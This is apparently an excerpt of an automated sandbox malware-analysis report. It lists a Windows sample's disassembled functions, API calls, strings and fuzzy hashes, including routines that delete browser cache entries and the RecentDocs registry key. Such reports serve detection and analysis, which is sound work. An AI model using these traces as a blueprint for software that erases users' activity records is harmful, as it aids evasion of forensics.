                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: ErrorModeModule$AddressExtensionFileFindHandleNamePathProclstrcatlstrcpy
                                • String ID: NotifyWinEvent$user32.dll
                                • API String ID: 4004864024-597752486
                                • Opcode ID: dcbdc58545cd4e1162221064df486b16a652db97318d6272985f662fc1f80566
                                • Instruction ID: 615a388b9bcc3293a458a96628157c91bad4f8643237e7b27ee424f6813bd525
                                • Opcode Fuzzy Hash: dcbdc58545cd4e1162221064df486b16a652db97318d6272985f662fc1f80566
                                • Instruction Fuzzy Hash: EB014F74A002508FC720AF259844A9A3BE8AF49758F05445FF5849B362EB79C800CB5B
                                Function 00438E30 Relevance: 9.1, APIs: 6, Instructions: 68windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004597B2: GetDlgItem.USER32(?,?), ref: 004597BF
                                • SendMessageA.USER32(?,000000CF,00000001,00000000), ref: 00438E58
                                • SendMessageA.USER32(?,000000CF,00000001,00000000), ref: 00438E73
                                • SendMessageA.USER32(?,000000CF,00000001,00000000), ref: 00438E8E
                                • SendMessageA.USER32(?,000000CF,00000001,00000000), ref: 00438EA9
                                • SendMessageA.USER32(?,000000CF,00000001,00000000), ref: 00438EC4
                                • SendMessageA.USER32(?,000000CF,00000001,00000000), ref: 00438EDF
                                  • Part of subcall function 00436B70: RegOpenKeyExA.KERNEL32 ref: 00436BD0
                                  • Part of subcall function 00456FEC: __EH_prolog.LIBCMT ref: 00456FF1
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: MessageSend$H_prologItemOpen
                                • String ID:
                                • API String ID: 2983078765-0
                                • Opcode ID: bee28f99374385575d7cab4925c685f48e7f35793e92d94da914d8f9674fc980
                                • Instruction ID: f8e102232e88c27b8a68ebd60c734d88dc141a5e6a7d4b07252fac42151194af
                                • Opcode Fuzzy Hash: bee28f99374385575d7cab4925c685f48e7f35793e92d94da914d8f9674fc980
                                • Instruction Fuzzy Hash: 7B112A713E1751B7F82A7B268C53F2E211B9BC4F14F01411AF7012F2D3CAE9E9828689
                                Function 004056E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66comCOMMON
                                Download Yara Rule
                                APIs
                                • CoCreateInstance.OLE32 ref: 00405710
                                • IUnknown_Release_Proxy.RPCRT4(?), ref: 0040572B
                                • GetWindowsDirectoryA.KERNEL32(00000001,00000104), ref: 00405739
                                • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000022,00000000), ref: 00405780
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: CreateDirectoryFolderInstancePathProxyRelease_SpecialUnknown_Windows
                                • String ID: \History
                                • API String ID: 3119684454-314617673
                                • Opcode ID: 3390bc1eba11084a4cc8e2fd908aad4860485e771c45de15bcf9dbbf2a06d188
                                • Instruction ID: 900f256215fbccf07109669abd3ee6d43b988d0dfea6ae5773aeef7301ea0bc3
                                • Opcode Fuzzy Hash: 3390bc1eba11084a4cc8e2fd908aad4860485e771c45de15bcf9dbbf2a06d188
                                • Instruction Fuzzy Hash: 03216274204741ABD710DF54DC45FAAB7A9EB85B00F00496EF5849B2C0D7B49845CFAA
                                Function 0042BAB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 55COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004597B2: GetDlgItem.USER32(?,?), ref: 004597BF
                                  • Part of subcall function 00459941: KiUserCallbackDispatcher.NTDLL(?,?), ref: 0045994E
                                • CoInitializeEx.COMBASE ref: 0042BAFA
                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0042BB26
                                  • Part of subcall function 00456F8E: MessageBoxA.USER32(?,?,?,?), ref: 00456FB6
                                Strings
                                • Security initialization failed, xrefs: 0042BB36
                                • COM initialization failed, xrefs: 0042BB08
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Initialize$CallbackDispatcherItemMessageSecurityUser
                                • String ID: COM initialization failed$Security initialization failed
                                • API String ID: 2763255498-2019830807
                                • Opcode ID: 0e0c895b859989d438ab38e8a594c5872f6e606db4c1caacad3cf4da41e47cf0
                                • Instruction ID: f88cc46181f4dfbc0f249d786d5360bfa143289b16b194d71d3c30d2b60c04a5
                                • Opcode Fuzzy Hash: 0e0c895b859989d438ab38e8a594c5872f6e606db4c1caacad3cf4da41e47cf0
                                • Instruction Fuzzy Hash: A001AD303D8B107AFA623632BD27F5C11856B50F26F60002FF606AE2D2DFDC6945828E
                                Function 00401220 Relevance: 7.6, APIs: 5, Instructions: 75COMMON
                                Download Yara Rule
                                APIs
                                • FindFirstUrlCacheEntryA.WININET(00000000,00000000,?), ref: 00401237
                                • FindFirstUrlCacheEntryA.WININET(00000000,00000000,?), ref: 0040124F
                                • DeleteUrlCacheEntry.WININET(?), ref: 00401287
                                • FindNextUrlCacheEntryA.WININET ref: 0040129D
                                • FindNextUrlCacheEntryA.WININET(00000000,00000000,?), ref: 004012BB
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: CacheEntry$Find$FirstNext$Delete
                                • String ID:
                                • API String ID: 3251259003-0
                                • Opcode ID: 89f70f0e96486f4d92bd3eeb09e83cf657234353214fdc9808606fbe77fdbd33
                                • Instruction ID: 988728bd11fdbca91c0b550d98239d6b5543920a559e34b5b42614616c157492
                                • Opcode Fuzzy Hash: 89f70f0e96486f4d92bd3eeb09e83cf657234353214fdc9808606fbe77fdbd33
                                • Instruction Fuzzy Hash: 3A11C3B2505305AFD220EF959C84E6BB3DC9F98354F04482EF945A2291D778DC088BAA
                                Function 0042CE40 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                Download Yara Rule
                                APIs
                                • GetVolumeInformationA.KERNEL32(?,?,00000018,?,?,?), ref: 0042CE96
                                  • Part of subcall function 00456FEC: __EH_prolog.LIBCMT ref: 00456FF1
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: H_prologInformationVolume
                                • String ID: %04X-%04X$C:\$disk error!
                                • API String ID: 1258155637-399326531
                                • Opcode ID: 6e15fd504c8c54dca98ca61168ccc2a65f08a8b0f6c50412227ce20cc2e1a098
                                • Instruction ID: cae5146e5efa9b00dd1fefc34af0bd2d153fb86159491f6109f916f967ad882e
                                • Opcode Fuzzy Hash: 6e15fd504c8c54dca98ca61168ccc2a65f08a8b0f6c50412227ce20cc2e1a098
                                • Instruction Fuzzy Hash: 8B31AD71204741AFC304DB68C845F5FBBA4AB85714F408A1EF1A6872D1DBB89509CB9A
                                Function 0045FB8F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48stringCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0045FBB1
                                • PathFindExtensionA.SHLWAPI(?), ref: 0045FBC8
                                • lstrcpyA.KERNEL32(00000000,?), ref: 0045FBF2
                                  • Part of subcall function 0045F8A9: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0045F8CC
                                  • Part of subcall function 0045F8A9: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 0045F8D7
                                  • Part of subcall function 0045F8A9: ConvertDefaultLocale.KERNEL32(?), ref: 0045F908
                                  • Part of subcall function 0045F8A9: ConvertDefaultLocale.KERNEL32(?), ref: 0045F910
                                  • Part of subcall function 0045F8A9: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 0045F91D
                                  • Part of subcall function 0045F8A9: ConvertDefaultLocale.KERNEL32(?), ref: 0045F937
                                  • Part of subcall function 0045F8A9: ConvertDefaultLocale.KERNEL32(000003FF), ref: 0045F93D
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: ConvertDefaultLocale$AddressModuleProc$ExtensionFileFindHandleNamePathlstrcpy
                                • String ID: %s.dll
                                • API String ID: 4178508759-3668843792
                                • Opcode ID: 3e24a30a05569ae7f589b37ec69413717422cff000f7d417d5ba677a669868ee
                                • Instruction ID: cc2ed34eadf9b4ba29d8b30092525c1cfbb258b8e0cff2dfd049ffe264f0ed61
                                • Opcode Fuzzy Hash: 3e24a30a05569ae7f589b37ec69413717422cff000f7d417d5ba677a669868ee
                                • Instruction Fuzzy Hash: D60188B1D0010CABCB15EFA5DC959EE77BDFB48305F0405BAEE06D3101E6B49A4D8B55
                                Function 0043CC40 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                Download Yara Rule
                                APIs
                                • IsWindow.USER32(00030426), ref: 0043CC46
                                • LoadCursorA.USER32(00000000,00007F00), ref: 0043CC76
                                  • Part of subcall function 00456E8B: GetClassInfoA.USER32(?,-0000007C,?), ref: 00456EEA
                                • SetWindowLongA.USER32(00030426,000000FC,0043C820), ref: 0043CCA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Window$ClassCursorInfoLoadLong
                                • String ID: (sM
                                • API String ID: 2858387636-3311458642
                                • Opcode ID: a7090532f8098ed2090d6412a7391523968236a1261bc1cd6769e82e2ec294ec
                                • Instruction ID: ef079a07a27ee7e5d70a19a55713efbde82861f97534fe9ab6d3067533c054b6
                                • Opcode Fuzzy Hash: a7090532f8098ed2090d6412a7391523968236a1261bc1cd6769e82e2ec294ec
                                • Instruction Fuzzy Hash: C3F05E70389310BBE31467A0AC5AF1A22199B44B45F20513FFF06BA2E5EAA86800C79D
                                Function 0045FA85 Relevance: 6.1, APIs: 4, Instructions: 71registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.KERNEL32(80000001,004D5904,00000000,00000001,?), ref: 0045FAC8
                                • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004), ref: 0045FAE8
                                • RegCloseKey.ADVAPI32(?), ref: 0045FB2C
                                • RegCloseKey.ADVAPI32(00000000), ref: 0045FB42
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Close$OpenQueryValue
                                • String ID:
                                • API String ID: 1607946009-0
                                • Opcode ID: 91043f04f9318fac727f71e0db06273f86fabba98528094b445e4c7aa36c70e2
                                • Instruction ID: ef4cf7c31f733ac53fc8ca2d79e85ee5050cdb63d3cced5bf84dc23dad16bdee
                                • Opcode Fuzzy Hash: 91043f04f9318fac727f71e0db06273f86fabba98528094b445e4c7aa36c70e2
                                • Instruction Fuzzy Hash: A8216DB1D00208EFDB21CF85D855AAEFBB8EF90315F1040BBE905A6211D3746A08CF66
                                Function 00455C79 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                Download Yara Rule
                                APIs
                                • FindResourceA.KERNEL32(?,00000000,00000005), ref: 00455C9F
                                • LoadResource.KERNEL32(?,00000000), ref: 00455CA7
                                • LockResource.KERNEL32(00000000), ref: 00455CB9
                                • FreeResource.KERNEL32(00000000), ref: 00455D03
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Resource$FindFreeLoadLock
                                • String ID:
                                • API String ID: 1078018258-0
                                • Opcode ID: 6af024dde24d29818a3f4c707ec0df0eb2a57cca12f1b9fef02d98814a47c105
                                • Instruction ID: a5e2a00811957388d8ef0ec10edfa5231714503df0fa2ad57628587c981f475f
                                • Opcode Fuzzy Hash: 6af024dde24d29818a3f4c707ec0df0eb2a57cca12f1b9fef02d98814a47c105
                                • Instruction Fuzzy Hash: 7B11913A500F05EFC7219F64D958AABB7B4FF04756F00802AEC4253751E3B8AC48DB54
                                Function 0045D956 Relevance: 6.0, APIs: 4, Instructions: 33stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenA.KERNEL32(?), ref: 0045D96B
                                • GetWindowTextA.USER32(?,?,00000100), ref: 0045D987
                                • lstrcmpA.KERNEL32(?,?), ref: 0045D99B
                                • SetWindowTextA.USER32(?,?), ref: 0045D9AB
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: TextWindow$lstrcmplstrlen
                                • String ID:
                                • API String ID: 330964273-0
                                • Opcode ID: 723314ce92d9a9a6c7fa22a0811cb053bfc38c175d037d9aceb4dfb7d1b4b655
                                • Instruction ID: bcf724bac57874a173b33d79688deb67c16571129e900e4812eadd9e8c43e4f8
                                • Opcode Fuzzy Hash: 723314ce92d9a9a6c7fa22a0811cb053bfc38c175d037d9aceb4dfb7d1b4b655
                                • Instruction Fuzzy Hash: DAF01DB5901118ABDF21AF64DD489CE7B79EF08355F0040A2FD45E6220E774CA94DB9A
                                Function 0043CDA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON
                                Download Yara Rule
                                APIs
                                • SystemParametersInfoA.USER32(00000029,00000000,?,00000000), ref: 0043CE22
                                • CreateFontIndirectA.GDI32(?), ref: 0043CE38
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: CreateFontIndirectInfoParametersSystem
                                • String ID: xsM
                                • API String ID: 3898911155-2849830882
                                • Opcode ID: 294213541f4df0dd98909d1590b6c0f9666c8c3f3db484b2e6d3c5be98dcea8c
                                • Instruction ID: f5a41c1656a517e53d87a5575b5162294697ca63d823790e3c27869578f867cc
                                • Opcode Fuzzy Hash: 294213541f4df0dd98909d1590b6c0f9666c8c3f3db484b2e6d3c5be98dcea8c
                                • Instruction Fuzzy Hash: 9E215C71504780DFD325DF29D8057DABBE8FF88714F008A2FE48A87251DBB89404CB56
                                Function 00405630 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                Download Yara Rule
                                APIs
                                • SHGetSpecialFolderPathA.SHELL32(00000000,00000008,00000008,00000000), ref: 00405650
                                • SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs), ref: 00405674
                                  • Part of subcall function 00405260: FindFirstFileA.KERNEL32(?,?,\*.*,00000004,?,?), ref: 0040530E
                                Strings
                                • Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs, xrefs: 0040566A
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: DeleteFileFindFirstFolderPathSpecial
                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
                                • API String ID: 1374875820-3036595939
                                • Opcode ID: 3fba9971ef62013d3833a1864c1ae7c2acc93c511651f1d626164a0a82a318e4
                                • Instruction ID: 659d51f54426914620f0ef7ac8131a6f5e17d26cd5e287e3669eafa29438ce9a
                                • Opcode Fuzzy Hash: 3fba9971ef62013d3833a1864c1ae7c2acc93c511651f1d626164a0a82a318e4
                                • Instruction Fuzzy Hash: 2FF03035244700AEE324A7109C06FEA7794AB54B10F44442DF985AA2C0EEF99484CB9B
                                Function 0045B192 Relevance: 4.6, APIs: 3, Instructions: 132filestringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenA.KERNEL32(0000B042), ref: 0045B1C6
                                  • Part of subcall function 0045B051: __EH_prolog.LIBCMT ref: 0045B056
                                  • Part of subcall function 0045B051: GetFullPathNameA.KERNEL32(?,00000104,?,?,?,?,?), ref: 0045B080
                                  • Part of subcall function 0045B051: lstrcpynA.KERNEL32(?,?,00000104), ref: 0045B091
                                • CreateFileA.KERNEL32(0000B042,80000000,00000000,0000000C,00000003,00000080,00000000,?,?,0000B042), ref: 0045B2DB
                                • GetLastError.KERNEL32 ref: 0045B2ED
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: CreateErrorFileFullH_prologLastNamePathlstrcpynlstrlen
                                • String ID:
                                • API String ID: 4207171074-0
                                • Opcode ID: a0ef4ab30a8c7bca15473b07d41fa31512ae2c4fa2b7c4a775cc0c152ee1711f
                                • Instruction ID: bc931f4a3eb57f992eb954223cc438830c3bf033075d61ebac5b1b5f474afd53
                                • Opcode Fuzzy Hash: a0ef4ab30a8c7bca15473b07d41fa31512ae2c4fa2b7c4a775cc0c152ee1711f
